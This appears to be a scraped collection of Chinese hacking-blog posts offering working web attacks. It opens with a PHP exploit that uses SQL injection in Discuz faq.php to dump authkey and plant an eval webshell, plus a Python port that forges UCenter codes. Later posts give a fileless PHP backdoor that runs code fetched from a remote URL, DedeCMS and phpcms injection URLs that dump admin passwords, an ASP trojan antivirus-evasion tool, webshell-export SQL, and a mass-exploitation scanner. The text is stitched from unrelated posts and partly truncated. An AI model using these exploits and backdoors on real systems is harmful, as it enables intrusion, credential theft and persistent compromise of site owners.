* @blog  : www.i0day.com
* @date  : 2014.7.2 23:1
*/

error_reporting(0);
set_time_limit(3000);
$host=$argv[1];
$path=$argv[2];
$js=$argv[3];
$timestamp = time()+10*3600;
$table="cdb_";//表名

if ($argc < 4) {   // host, path and js are all required
    print_r('
  ********************************************************
  *  Discuz faq.php SQL Injection Exp                    *
  *  ---------By:Www.i0day.com-----------               *
  *     Usage: php '.$argv[0].' host path js                *
  *  -------------------------------------               *
  *  js option: 1.GetShell 2.dump password 3.table prefix *
  *                                                      *
  *   php '.$argv[0].' Www.i0day.com / 1                    *
  *   php '.$argv[0].' Www.i0day.com /dz72/ 1               *
  *                                                      *
  ********************************************************
     ');
     exit;
}
if($js==1){
    $sql="action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x3a3a,(select%20length(authkey)%20from%20".$table."uc_applications%20limit%200,1),0x3a3a)x%20from%20information_schema.tables%20group%20by%20x)a)%23";
     $resp = sendpack($host,$path,$sql);

    if(strpos($resp,"::")===false){   // strpos() returns false, not -1, when the marker is absent
        echo 'Table prefix is probably not the default cdb_; check the prefix first (js=3)!';
    }else{
    preg_match("/::(.*)::/",$resp,$matches);
    $length=intval($matches[1]);
    if($length){
        if($length<=124){   // authkey is pulled in two 62-character slices below
            $sql="action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20substr(authkey,1,62)%20from%20".$table."uc_applications%20limit%200,1))x%20from%20information_schema.tables%20group%20by%20x)a)%23";
             $resp = sendpack($host,$path,$sql);
            if(strpos($resp,"1\^")!==false){
                preg_match("/1\^(.*)\'/U",$resp,$key1);
            $sql="action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20substr(authkey,63,62)%20from%20".$table."uc_applications%20limit%200,1))x%20from%20information_schema.tables%20group%20by%20x)a)%23";
             $resp = sendpack($host,$path,$sql);
            preg_match("/1\^(.*)\'/U",$resp,$key2);
            $key=$key1[1].$key2[1];
            $code=urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $key));
             $cmd1='<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">bbs.49you.com\');eval($_POST[i0day]);//</item>
</root>';
            $cmd2='<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">bbs.49you.com</item>
</root>';
            $html1 = send($cmd1);
            $res1=substr($html1,-1);
            $html2 = send($cmd2);
            $res2=substr($html2,-1);
            if($res1=='1'&&$res2=='1'){
            echo "shell address: http://".$host.$path.'config.inc.php   pass:i0day';
            }
            }else{
                echo 'Failed to retrieve authkey';
            }
        }
    }
   }

}elseif($js==2){
    $sql="action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%280x5E5E5E,username,0x3a,password,0x3a,salt%29%20from%20".$table."uc_members%20limit%200,1%29,floor%28rand%280%29*2%29,0x5E%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23";
     $resp = sendpack($host,$path,$sql);
    if(strpos($resp,"\^\^\^")!==false){
        preg_match("/\^\^\^(.*)\^/U",$resp,$password);
        echo 'username:password:salt = '.$password[1];
        }else{
            echo 'Table prefix is probably not the default cdb_; check the prefix first (js=3)!';
        }
}elseif($js==3){
    $sql="action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20hex(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),0x5E)x%20from%20information_schema%20.tables%20group%20by%20x)a)%23";
     $resp = sendpack($host,$path,$sql);
    if(strpos($resp,"1\^")!==false){
        preg_match("/1\^(.*)\^/U",$resp,$t);

        // the table name comes back hex-encoded, so decode it before comparing the prefix
        if(strpos(hex2str($t[1]),"cdb_")===0){
            echo "Table name: ".hex2str($t[1])." prefix is the default cdb_, nothing to change";
        }else{
            echo "Table name: ".hex2str($t[1]).' prefix is not the default cdb_, edit $table in the code';
        }
    }else{
        echo "Could not read the table prefix, sorry";
    }
}else{
    echo "No script function selected";
}

function sendpack($host,$path,$sql){
       $data = "GET ".$path."/faq.php?".$sql." HTTP/1.1\r\n";
        $data.="Host:".$host."\r\n";
        $data.="User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0\r\n";
         $data.="Connection: close\r\n\r\n";
        //$data.=$html."\r\n";
        $ock=fsockopen($host,80);

        if(!$ock){
        echo "No response from ".$host;
        die();

        }
        fwrite($ock,$data);

        $resp = '';

        while (!feof($ock)) {

                $resp.=fread($ock, 1024);
                }

        return $resp;

}
function send($cmd){
    global $host,$code,$path;
    $message = "POST ".$path."/api/uc.php?code=".$code."  HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: ".$host."\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
     $message .= "Host: ".$host."\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;

  //var_dump($message);
    $fp = fsockopen($host, 80);
    fputs($fp, $message);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
    $ckey_length = 4;

    $key = md5($key ? $key : UC_KEY);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';

    $cryptkey = $keya.md5($keya.$keyc);
    $key_length = strlen($cryptkey);

    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
     $string_length = strlen($string);

    $result = '';
    $box = range(0, 255);

    $rndkey = array();
    for($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }

    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }

    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }

    if($operation == 'DECODE') {
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
             return substr($result, 26);
        } else {
                return '';
            }
    } else {
        return $keyc.str_replace('=', '', base64_encode($result));
    }

}
function hex2str($hex){
    $str = '';
    $arr = str_split($hex, 2);
    foreach($arr as $bit){
        $str .= chr(hexdec($bit));
    }
    return $str;
    }
?>
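What the getshell branch above really depends on is _authcode(): once authkey is dumped through the injection, anyone can produce a "code" value that api/uc.php accepts. The Python port below is an added example, not code from the original post, and reproduces the PHP routine line for line (the RC4-style keystream keyed from md5 halves, the 10-digit expiry prefix and the 16-character MAC), plus a forge/verify pair modelled on how the exploit and the server use it; the key, the keyc value and the strings in the test are constructed.

```python
"""Python port of the _authcode() routine above (Discuz/UCenter authcode).
Added example, not code from the original post."""
import base64
import hashlib
import os
import time
from urllib.parse import quote, unquote


def _md5(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def authcode(string: bytes, operation: str = "DECODE", key: str = "",
             expiry: int = 0, keyc: str = None) -> bytes:
    """ENCODE: keyc + base64 (no '=') of RC4(expiry|mac|string). DECODE reverses and verifies."""
    ckey_length = 4
    key = _md5(key.encode())
    keya = _md5(key[:16].encode())                 # keystream key material
    keyb = _md5(key[16:32].encode())               # MAC key
    if operation == "DECODE":
        keyc = string[:ckey_length].decode("latin-1")
    elif keyc is None:
        keyc = _md5(os.urandom(8))[-ckey_length:]  # PHP uses md5(microtime()); any 4 chars work
    cryptkey = keya + _md5((keya + keyc).encode())
    if operation == "DECODE":
        body = string[ckey_length:]
        data = base64.b64decode(body + b"=" * (-len(body) % 4))   # PHP tolerates stripped padding
    else:
        stamp = ("%010d" % (expiry + int(time.time()) if expiry else 0)).encode()
        data = stamp + _md5(string + keyb.encode())[:16].encode() + string
    # key scheduling, exactly as in the two PHP loops
    box = list(range(256))
    rndkey = [ord(cryptkey[i % len(cryptkey)]) for i in range(256)]
    j = 0
    for i in range(256):
        j = (j + box[i] + rndkey[i]) % 256
        box[i], box[j] = box[j], box[i]
    out = bytearray()
    a = j = 0
    for c in data:
        a = (a + 1) % 256
        j = (j + box[a]) % 256
        box[a], box[j] = box[j], box[a]
        out.append(c ^ box[(box[a] + box[j]) % 256])
    result = bytes(out)
    if operation != "DECODE":
        return keyc.encode() + base64.b64encode(result).rstrip(b"=")
    # PHP: (expiry == 0 or expiry still in the future) and the 16-char MAC matches
    try:
        stamp = int(result[:10])
    except ValueError:
        return b""                                 # wrong key: garbage where the timestamp should be
    mac_ok = result[10:26] == _md5(result[26:] + keyb.encode())[:16].encode()
    if (stamp == 0 or stamp - int(time.time()) > 0) and mac_ok:
        return result[26:]
    return b""


def forge_uc_code(authkey: str, action: str = "updateapps", ttl: int = 10 * 3600) -> str:
    """What the exploit builds once authkey is dumped: a URL-encoded 'code' for api/uc.php."""
    payload = ("time=%d&action=%s" % (int(time.time()) + ttl, action)).encode()
    return quote(authcode(payload, "ENCODE", authkey))


def verify_uc_code(code: str, authkey: str) -> bytes:
    """Server-side view: api/uc.php URL-decodes 'code' and runs authcode(..., 'DECODE', UC_KEY)."""
    return authcode(unquote(code).encode("latin-1"), "DECODE", authkey)
```

The MAC covers only the payload and is keyed by keyb, which is derived from the same secret; the construction is sound only as long as authkey stays secret, which is exactly what a single error-based injection against uc_applications breaks.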
PHP fileless backdoor: code executed in an endless loop
http://www.mumaasp.com/192.html, Tue, 08 Oct 2013 03:56:29 +0000, by admin

nonshell.php
<?php
unlink($_SERVER['SCRIPT_FILENAME']);
ignore_user_abort(true);
set_time_limit(0);

$remote_file = 'http://www.mumaasp.com/eval.txt';
while($code = file_get_contents($remote_file)){
  @eval($code);
  sleep(5);
};
?>
Contents of eval.txt:
file_put_contents('1.txt','hello world '.time());
Usage: upload nonshell.php to the server and request it once. It deletes itself, but the process keeps running in the background and executes the code in eval.txt every 5 seconds. To stop it, delete or empty eval.txt. Drawback: once the server or the web container restarts, the backdoor is gone.
[Hot] DedeCMS plus/search.php injection: how to exploit it
http://www.mumaasp.com/180.html, Sun, 20 Jan 2013 19:10:00 +0000, by admin

This is how I usually test it. Submit /plus/search.php?keyword=as&typeArr[1 uNion 1]=a

看结果如果提示 Safe Alert: Request Error step 2 ! 那么直接用下面的exp

/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a  

QQ截图20130119225931.jpg

看结果如果提示 Safe Alert: Request Error step 1 ! 那么直接用下面的exp

/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a  

QQ截图20130119225757.jpg

如果正常显示证明漏洞不存在了。]]>
http://www.mumaasp.com/180.html/feed 0
Taking a site with the latest DEDECMS 5.7 injection vulnerability [original] http://www.mumaasp.com/175.html Thu, 22 Nov 2012 04:49:15 +0000 admin 20111227
Then visit the page "/member/ajax_membergroup.php?action=post&membergroup=1".
Returned content:
 朋友  修改 (injectable)
Submit the statement /member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` to look up the administrator id.
Result:
 admin  修改 (this gives the backend login account admin)
Next, dump the password field:
/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'`
Result:
 4880ad187e377d8616d4
What we get is 19 characters; strip the first three and the last one to get the administrator's 16-character MD5:
0ad187e377d8616d
Took it to cmd5 to crack; it prompts for payment.
Dropped the ciphertext straight into Google and got the password:
coolboy
Tried logging in: OK.
The process went fairly smoothly; no D盾 encountered.
Mumaasp release: asp trojan AV-evasion tool code http://www.mumaasp.com/172.html Tue, 06 Nov 2012 06:31:55 +0000 admin
Simple AV evasion for asp trojans; it only supports simple encryption of the content between <% %> in an asp file. The principle is simple and follows lake2's "ASP后门之终极伪装": the ASP is encrypted with a shift cipher. Because handling it is cumbersome, the whole asp file is not encrypted, but for ordinary web trojans this is enough to evade detection. A related tool is 黑客伟's work; this is only meant to give an idea, and I hope people can build better evasion tools. Save the asp script to be encrypted as a separate asp file; the file may contain the strings before and after <% %>. Main code:

unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, Buttons;

type
  TForm1 = class(TForm)
    Edit1: TEdit;
    SpeedButton1: TSpeedButton;
    OpenDialog1: TOpenDialog;
    Button1: TButton;
    Button2: TButton;
    procedure Button2Click(Sender: TObject);
    procedure SpeedButton1Click(Sender: TObject);
    procedure Button1Click(Sender: TObject);
    procedure FormCreate(Sender: TObject);
  private
    { Private declarations }
    but:integer;
    KeyName:widestring;
    Crlf:WideString;
    //shift-cipher encoding
    function Shift(FName:string):WideString;
    function UnEncodeStr:WideString;
    procedure FileASP;
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.Button2Click(Sender: TObject);
begin
  close;
end;

procedure TForm1.SpeedButton1Click(Sender: TObject);
begin
  if OpenDialog1.Execute then
    edit1.Text :=OpenDialog1.FileName;
end;

procedure TForm1.Button1Click(Sender: TObject);
begin
  if trim(edit1.Text)='' then
  begin
    MessageBox(0,'请选择要加密的文件!','提示',MB_ICONINFORMATION);
    exit;
  end;
  if pos('.asp',edit1.Text)=0 then
  begin
    MessageBox(0,'请选择正确的文件格式!','提示',MB_ICONINFORMATION);
    Exit;
  end;
  FileASP;
  MessageBox(0,'加密完成!','提示',0);
end;

procedure TForm1.FileASP;
VAR
  f:TEXTfile;
  st:WideString;
begin
  assignfile(f,ExtractFileDir(Application.Exename)+'\muma.asp');
  st:=Shift(trim(Edit1.Text));
  rewrite(f);    //create
  writeln(f,st); //write
  closefile(f);  //close file
end;

function TForm1.Shift(FName: string): WideString;
var
  f:TStringList;
  i,j,pk:integer; //the shift parameter should lie between -95 and +95
  cc:WideString;
begin
  result:='';
  cc:='';
  f:=TStringList.Create;
  try
    f.LoadFromFile(FName);
    for i:=0 to f.Count-1 do
    begin
      cc:=cc+f[i]+KeyName;
    end;
  finally
    f.Free;
  end;
  cc:=StringReplace(cc,'<%','',[rfReplaceAll]);
  cc:=StringReplace(cc,'%>','',[rfReplaceAll]);
  for j:=1 to length(cc) do
  begin
    //09: Tab key
    if (cc[j]<>KeyName) and (Ord(cc[j])<>9) and (Ord(cc[j])<127) then
    begin
      begin
        pk:=Ord(cc[j])+but;
        if pk>126 then
          pk:=pk-95
        else if pk<32 then
          pk:=pk+95;
        Result:=Result+Chr(pk);
      end;
    end
    else
      Result:=Result+cc[j];
  end;
  Result:='<%'+Crlf+'xu="'+StringReplace(Result,'"','""',[rfReplaceAll])+
    '"'+Crlf+'execute(UnEncode(xu))'+Crlf+UnEncodeStr;
end;

function TForm1.UnEncodeStr: WideString;
var
  Str:string;
begin
  Str :='function UnEncode(temp)'+Crlf+
    '   but='+inttostr(but)+Crlf+
    '   for i = 1 to len(temp)'+Crlf+
    '     if mid(temp,i,1)<>"'+KeyName+'" then'+Crlf+
    '         If Asc(Mid(temp, i, 1)) < 32 Or Asc(Mid(temp, i, 1)) > 126 Then'+Crlf+
    '           a = a & Chr(Asc(Mid(temp, i, 1)))'+Crlf+
    '         else'+Crlf+
    '           pk=asc(mid(temp,i,1))-but'+Crlf+
    '           if pk>126 then'+Crlf+
    '             pk=pk-95'+Crlf+
    '           elseif pk<32 then'+Crlf+
    '             pk=pk+95'+Crlf+
    '           end if'+Crlf+
    '           a=a&chr(pk)'+Crlf+
    '         end if'+Crlf+
    '     else'+Crlf+
    '         a=a&vbcrlf'+Crlf+
    '     end if'+Crlf+
    '   next'+Crlf+
    '   UnEncode=a'+Crlf+
    'end function'+Crlf+
    '%>';
  Result :=Str;
end;

procedure TForm1.FormCreate(Sender: TObject);
begin
  //pick a random shift parameter
  Randomize;
  but:=trunc(random(95+1+95)-95);
  //but:=1;
  KeyName:=Chr(random(128)+127)+Chr(random(127)+128);
  //KeyName:='琳';
  Crlf:=char(13)+char(10);
end;

end.

Getting a webshell by exporting a one-line trojan through ACCESS SQL statement execution http://www.mumaasp.com/166.html Fri, 19 Oct 2012 09:16:56 +0000 admin
Execute the following statements one by one to export the one-liner.
First statement: create table cmd (a varchar(50))
Second statement: insert into cmd (a) values ('一句话木马')
Third statement: select * into [a] in 'e:\web\mumaasp\1.asa;x.xls' 'excel 4.0;' from cmd
Fourth statement: drop table cmd
Then connect to http://www.mumaasp.com/1.asa;x.xls directly in 菜刀. What the SQL statements mean: the first creates a table named cmd with a single field a, of character type, length 50; the second inserts the one-line trojan into field a of table cmd; the third exports the contents of field a of table cmd to an EXCEL file under the path e:\web\mumaasp\; the fourth drops the cmd table that was created.
The following is a test. Exporting a WebShell through Access's backend SQL execution feature is even simpler:
Select 'asp一句话木马' into [vote] in 'e:\web\mumaasp\1.asa;x.xls' 'excel 8.0;' from vote
or
Select 'php一句话木马' into outfile 'F:/wwwroot//eval.php';
The backend must have an execute-SQL feature (vote is a known table).
AV-evading 超越神界 Asp big trojan with powerful features, free download http://www.mumaasp.com/154.html Fri, 12 Oct 2012 13:08:55 +0000 admin
Batch trojan cleanup and batch replace features. Replacing a million pages at once will not time out the script. Batch trojan injection also has anti-removal protection. The big trojan is divided into four categories: file management, information gathering, privilege escalation, other. 超越神界 AV-evading Asp trojan, default password: ; please change it promptly after downloading! As shown: powerful trojan-injection feature! Download: 免杀超越神界Asp大马

Latest AV-evading 草泥马 4.0 Asp big trojan, unencrypted source download http://www.mumaasp.com/146.html Fri, 12 Oct 2012 09:20:18 +0000 admin
Asp big trojans are very popular; the mainstream ones have very good privilege-escalation, information-gathering and trojan-hiding features. This one also integrates some fairly practical features, such as SEO info lookup, same-server lookup, page-weight lookup, malformed directory creation, and file protection! 草泥马 4.0 AV-evading trojan, default password: ; please change it after downloading! As shown: malformed dotted directory. Features as shown. Download: 草泥马4.0(未加密)去后门版, 草泥马4.0(加密)免杀版

AV-evading php big trojan with various privilege-escalation 0days, plaintext version, no encrypted backdoors! http://www.mumaasp.com/139.html Thu, 11 Oct 2012 13:34:13 +0000 admin
PHP trojan integrating multiple privilege-escalation 0days, password: . Interface below: PHP big trojan feature interface. SU privilege escalation! cmd privilege escalation, plus registry and other operations; download link below. Plaintext, unencrypted; encrypt it yourself for AV evasion; no backdoor! Download: 超强PHP大马,提权必备!

Dedecms 5.3-5.7 universal batch Getwebshell code http://www.mumaasp.com/137.html Wed, 10 Oct 2012 13:30:29 +0000 admin
<?php print_r(' [-]Exploit Title: DEDEcms Variable coverage [-]Date: 1182011 [-]Getshell Author: cfking#90sec.org [-]Site from google ' ); error_reporting(E_ERROR); set_time_limit(0); $keyword='Powered by dedecms' ;//search keyword
$timeout = 30; $stratpage = 5; $lastpage = 10000000; //
for ($i=$stratpage ; $i<=$lastpage ; $i++ ){ $array=ReadgoogleList($keyword,$timeout,$i); foreach ($array as $url ){ $url_list=file('c:/url.txt'); if (in_array("$urlrn",$url_list)){ echo "[*] Links repeatn"; }else{ $fp = @fopen('c:/url.txt', 'a'); @fwrite($fp, $url."rn"); @fclose($fp); print_r(" [-] Geting URL: $urlrn"); $exploit=Getshell($url); if (strpos($exploit,"OK")>2){ echo "[*] ".$url."/plus/huenke.phprn"; $name=rname($url); if(strpos($name,"200")>5){ echo "[*] Rename Successn"; echo "[*] Record Successn"; $fp = @fopen('c:/shell.txt', 'a'); @fwrite($fp, $url."/plus/huenke.phprn"); @fclose($fp); } } } } } /** exploit **/ function Getshell($url){//$content below needs to be edited yourself
$host=$url; $port="80"; $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=IP地址&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=数据库用户名&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=数据库密码&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=数据库名称&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";//capture a request and edit this yourself
$data = "POST /plus/mytag_js.php?aid=1 HTTP/1.1rn"; $data .= "Host: ".$host."rn"; $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1rn"; $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn"; $data .= "Accept-Language: zh-cn,zh;q=0.5rn"; //$data .= "Accept-Encoding: gzip,deflatern";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7rn"; $data .= "Connection: keep-alivern"; $data .= "Content-Type: application/x-www-form-urlencodedrn"; $data .= "Content-Length: ".strlen($content)."rnrn"; $data .= $content."rn"; $ock=fsockopen($host,$port); if (!$ock) { echo "[*] No response from $host n"; } fwrite($ock,$data); while (!feof($ock)) { $exp=fgets($ock, 1024); return $exp; } } /** return the URL list for this results page **/ function ReadgoogleList($keyword,$timeout,$nowpage) { $tmp = array(); $data = ''; $nowpage = ($nowpage-1)*10; $fp = @fsockopen('www.google.com.hk',80,$errno,$errstr,$timeout); @fputs($fp,"GET /search?q=".urlencode($keyword)."&start=".$nowpage." HTTP/1.1rnHost:www.google.com.hkrnConnection: Closernrn"); while ($fp && !feof($fp)) $data .= fread($fp, 102400); @fclose($fp); preg_match_all("/<cite>(.*?)//",$data,$tmp); $num = count($tmp[1]); $array = array(); for($i = 0;$i < $num;$i++) { $row = explode('/',$tmp[1][$i]); $array[] = str_replace('http://','',$row[0]); } return $array; } /** rename the vulnerable file to prevent it from being exploited again **/ function rname($url){//fill in according to the instructions
$host=$url; $port="80"; $content ='';//capture and edit a 菜刀 packet yourself
$data = "POST /plus/你后门地址 HTTP/1.1rn"; $data .= "X-Forwarded-For: 199.1.88.29rn"; $data .= "Referer: http://$hostrn"; $data .= "Content-Type: application/x-www-form-urlencodedrn"; $data .= "User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0rn"; $data .= "Host: $hostrn"; $data .= "Content-Length: ".strlen($content)."rn"; $data .= "Cache-Control: no-cachernrn"; $data .= $content."rn"; $ock=fsockopen($host,$port); if (!$ock) { echo "[*] No response from $host rn"; } fwrite($ock,$data); while (!feof($ock)) { $exp=fgets($ock, 1024); return $exp; } } ?>

Classic AV-evading Asp big trojan with hide-as-system-file, Ftp anti-delete and other features! http://www.mumaasp.com/132.html Sun, 07 Oct 2012 07:25:01 +0000 admin
Asp big trojan feature interface. A very classic Asp side-site helper, the so-called Asp small trojan. Download: 发布的免杀Asp大马, 经典旁注木马解密版

Webshell dedicated to virtual-host privilege escalation, super AV-evading version released! http://www.mumaasp.com/126.html Sat, 06 Oct 2012 14:37:26 +0000 admin
Feature interface: collects powerful privilege-escalation 0days for various virtual hosts! Download: 星外-华众-新网-虚拟主机提权专用Webshell 发布

Decrypted version of the super AV-evading php big trojan released! http://www.mumaasp.com/114.html Sat, 06 Oct 2012 13:55:51 +0000 admin
Very powerful features, decrypted with no backdoor! Super proxy feature, you know what I mean. Decrypted version, no encrypted backdoors! Download: 超级免杀PHP大马解密版

Phpcms2008 0day vulnerability and EXP http://www.mumaasp.com/109.html Sat, 06 Oct 2012 10:15:07 +0000 admin
(.+)<\/span>/", $outcode, $x); if (strlen (trim ($x [1])) == 0) return false; else return true; } $query = "x%2527"; $outcode = request ($hostname, $path, $query); preg_match('/FROM `(.+)yp_job/ie',$outcode,$match); $prefix=$match[1]; //function lengthcolumns () //{ echo "\n--------------------------------------------------------------------------------\n"; echo " PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit\n"; echo " By My5t3ry (http://hi.baidu.com/netstart)\n"; echo "\n--------------------------------------------------------------------------------\n"; echo "[~]trying to get pre...\n"; if ($match[1]) { echo '[+]Good Job!Wo Got The pre -> '.$match[1]."\n"; } else { die(" Exploit failed..."); } echo "[~]trying to get username length...\n"; $exit=0; $length=0; $i=0; while ($exit==0) { $query = "x' OR length((select username from ".$prefix."member Where userid='{$userid}'))=".$i." OR '1'='2"; $query = str_replace (" ", "%20", $query); $query = str_replace ("'", "%2527", $query); $outcode = request ($hostname, $path, $query); $i++; preg_match ("/(.+)<\/span>/", $outcode, $x); //echo $outcode; if ($i>20) {die(" Exploit failed...");} if (strlen (trim ($x [1])) != 0) { $exit=1; }else{ $exit=0; } } $length=$i-1; echo "[+]length -> ".$length; // return $length; //} echo "\n[~]Trying to Crack..."; echo "\n[+]username -> "; while ($pos "; while ($pos

Latest Shopex frontend ordinary-user getshell vulnerability http://www.mumaasp.com/103.html Thu, 04 Oct 2012 08:28:49 +0000 admin
Code:
mumaas.com' union select  CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php'  #
The one-liner's password is #. This vulnerability has requirements: the mysql user needs sufficient privileges, the export directory must be writable, and the server environment has to cooperate. If you cannot getshell, you can also try injection; cracking the password and getting into the backend works just as well.
(shell screenshot)
The backdoor in 草泥马, 紫云残雪 and other Asp trojans: leaking the password http://www.mumaasp.com/52.html Wed, 03 Oct 2012 13:27:48 +0000 admin
Any Asp trojan whose login page looks similar to this one can be tested for the following backdoor.

if session("KKK")<>UserPass then 'the Asp trojan's password check itself is fine
if request.form("pass")<>"" then
if request.form("pass")=UserPass then
session("KKK")=UserPass
response.redirect url
else 'the key part is here
j"<br><br><br><b><div align=center><font size='5' color='red'>草泥马!</font"&userpass&"></b> <br><br><br><br><b><div align=center><font size='14' color='lime'></font></b></p></center>"&backurl
end if    'enter any wrong password, then view the page source and you will find the password has been written into it, as in the picture below

With the password ziyun588 we successfully enter the Asp trojan's feature interface.
Latest phpcms v9 database dump vulnerability: leaks the administrator account and password! http://www.mumaasp.com/45.html Wed, 03 Oct 2012 05:28:31 +0000 admin
Step three: dump the user password (the red text below is the table prefix you need to change):
http://www.mumaasp.com/api.php?op=add_favorite&url=v9&title=%2527%2520and%2520%2528select%25201%2520from%2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select%2520%2528select%2520concat%25280x23%252Ccast%2528concat%2528username%252C0x3a%252Cpassword%252C0x3a%252Cencrypt%2529%2520as%2520char%2529%252C0x23%2529%2520from%2520v9_admin%2520LIMIT%25200%252C1%2529%2529%2520from%2520information_schema.tables%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from%2520information_schema.tables%2520group%2520by%2520x%2529a%2529%2520and%2520%25271%2527%253D%25271
As shown: (screenshot)